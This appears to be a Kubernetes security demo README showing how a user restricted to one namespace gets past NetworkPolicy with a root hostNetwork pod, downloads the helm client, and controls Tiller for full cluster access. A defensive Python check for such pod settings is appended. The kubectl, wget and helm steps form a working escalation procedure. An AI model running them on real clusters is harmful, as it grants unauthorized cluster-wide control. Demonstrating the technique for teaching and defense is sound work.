Privilege escalation

This scenario demonstrates how a malicious insider, or an attacker holding that insider's compromised credentials, who is only allowed to create pods in a single namespace can escalate privileges and bypass network policy to gain full cluster access.

Demo

[asciicast recording of the demo]

NOTE: This scenario runs a container with root access and is intended for demo purposes only. We strongly recommend NOT RUNNING IT ON A LIVE CLUSTER.

Prerequisites

Make sure your cluster is set up following the instructions here.

Let's hack it

Setup and install the RBAC and Network policy

1. Apply the network policy and RBAC rules:

```sh
kubectl apply -f privilege-escalation/daemonset.yaml
```

2. Test the access to the system:

```sh
kubectl auth can-i --as [email protected] create pods -n kube-system
kubectl auth can-i --as [email protected] create pods -n default
```

Deploy sample pod to test the access

1. Deploy a simple pod:

```sh
kubectl --as [email protected] apply -f privilege-escalation/simplepod.yaml
```

2. Get a shell in the pod:

```sh
kubectl --as [email protected] exec -it simplepod -- /bin/sh
```

3. Attempt to reach Tiller directly, then leave the pod:

```sh
wget -qO - tiller-deploy.kube-system:44134
exit
```

Bypass NetworkPolicy

1. Deploy a hostNetwork pod that bypasses the network egress policy on the namespace:

```sh
kubectl --as [email protected] apply -f privilege-escalation/hostnetwork.yaml
```

2. Exec in, download the helm client binary and run helm ls to show that it can control Tiller:

```sh
kubectl --as [email protected] exec -it hostnetwork -- /bin/sh
```

Inside the pod:

```sh
export PATH=/tmp:$PATH
cd /tmp
wget -qO helm.tar.gz https://get.helm.sh/helm-v2.16.1-linux-amd64.tar.gz
tar zxvf helm.tar.gz
chmod +x linux-amd64/helm
cp linux-amd64/helm .
export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134
helm version
exit
```
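A defender-side check for the settings this scenario relies on, added here as an example and not code from this repository: it inspects a pod manifest in dict form and flags hostNetwork (which takes the pod's traffic out from under the namespace NetworkPolicy), the other host namespaces, privileged containers and explicit root users. The field names are the real PodSpec fields; the two manifests are constructed stand-ins for simplepod.yaml and hostnetwork.yaml.

```python
"""Admission-style pod check for the namespace-escape settings this scenario
relies on. Constructed example, not part of the repository; the two manifests
below are stand-ins for simplepod.yaml and hostnetwork.yaml in dict form."""
from typing import Dict, List

# PodSpec fields that put a workload outside the namespace boundary. A pod with
# hostNetwork=true sends traffic from the node's network namespace, so the
# namespace NetworkPolicy never sees it; the baseline Pod Security Standard
# rejects all three fields.
HOST_NAMESPACE_FIELDS = {
    "hostNetwork": "bypasses the namespace NetworkPolicy (traffic leaves from the node)",
    "hostPID": "exposes every process on the node",
    "hostIPC": "shares the node's IPC namespace",
}


def pod_escape_findings(manifest: Dict) -> List[str]:
    """One finding per escape setting; an empty list means the pod stays inside
    namespace isolation and the namespace NetworkPolicy applies to it."""
    spec = manifest.get("spec") or {}
    name = (manifest.get("metadata") or {}).get("name", "<unnamed>")
    findings: List[str] = []
    for field, reason in HOST_NAMESPACE_FIELDS.items():
        if spec.get(field) is True:
            findings.append(f"{name}: spec.{field}=true {reason}")
    containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
    for c in containers:
        sc = c.get("securityContext") or {}
        cname = c.get("name", "<unnamed>")
        if sc.get("privileged") is True:
            findings.append(f"{name}/{cname}: privileged container")
        if sc.get("runAsUser") == 0 or sc.get("runAsNonRoot") is False:
            findings.append(f"{name}/{cname}: explicitly runs as root")
    return findings


# Constructed stand-ins for the scenario's manifests (not the repo's YAML).
SIMPLE_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "simplepod", "namespace": "default"},
    "spec": {"containers": [{"name": "shell", "image": "busybox"}]},
}
HOST_NETWORK_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "hostnetwork", "namespace": "default"},
    "spec": {"hostNetwork": True,
             "containers": [{"name": "shell", "image": "busybox",
                             "securityContext": {"runAsUser": 0}}]},
}
```

Run `pod_escape_findings` over a manifest before admitting it: the simple pod yields no findings, while the hostNetwork pod yields two, and either finding is grounds for an admission controller to reject the pod in a namespace that relies on NetworkPolicy for isolation.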

Cleanup

To clean up, run:

```sh
kubectl delete -f privilege-escalation/
```